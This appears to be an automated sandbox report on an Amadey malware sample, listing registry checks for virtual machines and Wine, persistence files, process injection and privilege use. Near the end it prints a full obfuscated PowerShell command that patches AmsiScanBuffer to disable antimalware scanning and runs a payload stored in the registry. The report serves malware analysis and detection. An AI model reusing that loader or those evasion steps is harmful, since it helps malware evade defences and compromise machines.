amadey | ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	axplons.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

Executes dropped EXE 7 IoCs

pid	Process
4548	axplons.exe
460	axplons.exe
3620	Kaxhwswfup.exe
704	$77ea4744
4108	$77c1559d
2148	axplons.exe
3236	axplons.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine	axplons.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
2300	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
4548	axplons.exe
460	axplons.exe
2148	axplons.exe
3236	axplons.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3620 set thread context of 704	3620	Kaxhwswfup.exe	101
PID 468 set thread context of 3088	468	powershell.EXE	104
PID 3620 set thread context of 4108	3620	Kaxhwswfup.exe	105

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4672	4108	WerFault.exe	105
1364	4108	WerFault.exe	105

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2300	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
2300	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
4548	axplons.exe
4548	axplons.exe
460	axplons.exe
460	axplons.exe
468	powershell.EXE
468	powershell.EXE
468	powershell.EXE
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3620	Kaxhwswfup.exe
3620	Kaxhwswfup.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
4672	WerFault.exe
4672	WerFault.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe
4984	svchost.exe
4984	svchost.exe
3088	dllhost.exe
3088	dllhost.exe
3088	dllhost.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	3620	Kaxhwswfup.exe
Token: SeDebugPrivilege	468	powershell.EXE
Token: SeDebugPrivilege	468	powershell.EXE
Token: SeDebugPrivilege	3088	dllhost.exe
Token: SeDebugPrivilege	3620	Kaxhwswfup.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeRestorePrivilege	4672	WerFault.exe
Token: SeBackupPrivilege	4672	WerFault.exe
Token: SeShutdownPrivilege	3496	Explorer.EXE
Token: SeCreatePagefilePrivilege	3496	Explorer.EXE
Token: SeShutdownPrivilege	3496	Explorer.EXE
Token: SeCreatePagefilePrivilege	3496	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3496	Explorer.EXE
Token: SeCreatePagefilePrivilege	3496	Explorer.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3496	Explorer.EXE
4036	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 4548	2300	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe	93
PID 2300 wrote to memory of 4548	2300	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe	93
PID 2300 wrote to memory of 4548	2300	ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe	93
PID 4548 wrote to memory of 3620	4548	axplons.exe	97
PID 4548 wrote to memory of 3620	4548	axplons.exe	97
PID 4548 wrote to memory of 3620	4548	axplons.exe	97
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 3620 wrote to memory of 704	3620	Kaxhwswfup.exe	101
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 468 wrote to memory of 3088	468	powershell.EXE	104
PID 3088 wrote to memory of 616	3088	dllhost.exe	5
PID 3088 wrote to memory of 672	3088	dllhost.exe	7
PID 3088 wrote to memory of 948	3088	dllhost.exe	12
PID 3088 wrote to memory of 1016	3088	dllhost.exe	13
PID 3088 wrote to memory of 416	3088	dllhost.exe	14
PID 3088 wrote to memory of 1052	3088	dllhost.exe	16
PID 3088 wrote to memory of 1100	3088	dllhost.exe	17
PID 3088 wrote to memory of 1124	3088	dllhost.exe	18
PID 3088 wrote to memory of 1184	3088	dllhost.exe	19
PID 3088 wrote to memory of 1204	3088	dllhost.exe	20
PID 3088 wrote to memory of 1288	3088	dllhost.exe	21
PID 3088 wrote to memory of 1312	3088	dllhost.exe	22
PID 3088 wrote to memory of 1320	3088	dllhost.exe	23
PID 3088 wrote to memory of 1448	3088	dllhost.exe	24
PID 3088 wrote to memory of 1472	3088	dllhost.exe	25
PID 3088 wrote to memory of 1496	3088	dllhost.exe	26
PID 3088 wrote to memory of 1508	3088	dllhost.exe	27
PID 3088 wrote to memory of 1664	3088	dllhost.exe	28
PID 3088 wrote to memory of 1716	3088	dllhost.exe	29
PID 3088 wrote to memory of 1728	3088	dllhost.exe	30
PID 3088 wrote to memory of 1796	3088	dllhost.exe	31
PID 3088 wrote to memory of 1876	3088	dllhost.exe	32
PID 3088 wrote to memory of 1996	3088	dllhost.exe	33
PID 3088 wrote to memory of 1352	3088	dllhost.exe	34
PID 3088 wrote to memory of 1348	3088	dllhost.exe	35
PID 3088 wrote to memory of 1568	3088	dllhost.exe	36
PID 3088 wrote to memory of 2116	3088	dllhost.exe	37
PID 3088 wrote to memory of 2140	3088	dllhost.exe	38
PID 3088 wrote to memory of 2288	3088	dllhost.exe	39
PID 3088 wrote to memory of 2396	3088	dllhost.exe	41
PID 3088 wrote to memory of 2456	3088	dllhost.exe	42
PID 3088 wrote to memory of 2492	3088	dllhost.exe	43
PID 3088 wrote to memory of 2656	3088	dllhost.exe	44
PID 3088 wrote to memory of 2716	3088	dllhost.exe	45
PID 3088 wrote to memory of 2732	3088	dllhost.exe	46
PID 3088 wrote to memory of 2740	3088	dllhost.exe	47
PID 3088 wrote to memory of 2852	3088	dllhost.exe	48
PID 3088 wrote to memory of 2912	3088	dllhost.exe	49
PID 3088 wrote to memory of 2944	3088	dllhost.exe	50
PID 3088 wrote to memory of 2964	3088	dllhost.exe	51
PID 3088 wrote to memory of 2980	3088	dllhost.exe	52

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{349df8a7-7062-481f-95b3-3bea866e6f18}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3088

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1204
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2656
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SHDTvOeefjQR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dvvFHhherwTghR,[Parameter(Position=1)][Type]$tLvfoLsHxH)$grNmOjMdnJl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+[Char](115)+',P'+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$grNmOjMdnJl.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+'P'+'u'+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$dvvFHhherwTghR).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$grNmOjMdnJl.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'Sl'+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$tLvfoLsHxH,$dvvFHhherwTghR).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $grNmOjMdnJl.CreateType();}$ugtWeUYzVAgJn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+'et'+[Char](104)+'o'+[Char](100)+'s');$KxbSTMvKXWVOcD=$ugtWeUYzVAgJn.GetMethod(''+[Char](71)+''+'e'+''+'t'+'P'+'r'+''+'o'+'c'+[Char](65)+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZTBhYVTCDczgfZPNLNU=SHDTvOeefjQR @([String])([IntPtr]);$jNjqJUgULnQEnfYUUVVtnR=SHDTvOeefjQR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SZBFqTIfLCM=$ugtWeUYzVAgJn.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'du'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$VruUQxkpTBVYNU=$KxbSTMvKXWVOcD.Invoke($Null,@([Object]$SZBFqTIfLCM,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'b'+[Char](114)+''+'a'+'r'+'y'+''+[Char](65)+'')));$RevOGNHrgeAImnage=$KxbSTMvKXWVOcD.Invoke($Null,@([Object]$SZBFqTIfLCM,[Object]('Vir'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+'ect')));$mdVZoxx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VruUQxkpTBVYNU,$ZTBhYVTCDczgfZPNLNU).Invoke('a'+'m'+'si'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$PajewgEzorcPOFbBB=$KxbSTMvKXWVOcD.Invoke($Null,@([Object]$mdVZoxx,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+'Bu'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$sBYLAmQthB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevOGNHrgeAImnage,$jNjqJUgULnQEnfYUUVVtnR).Invoke($PajewgEzorcPOFbBB,[uint32]8,4,[ref]$sBYLAmQthB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PajewgEzorcPOFbBB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevOGNHrgeAImnage,$jNjqJUgULnQEnfYUUVVtnR).Invoke($PajewgEzorcPOFbBB,[uint32]8,0x20,[ref]$sBYLAmQthB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:468
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2148
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3236

C:\Windows\system32\svchost.exe
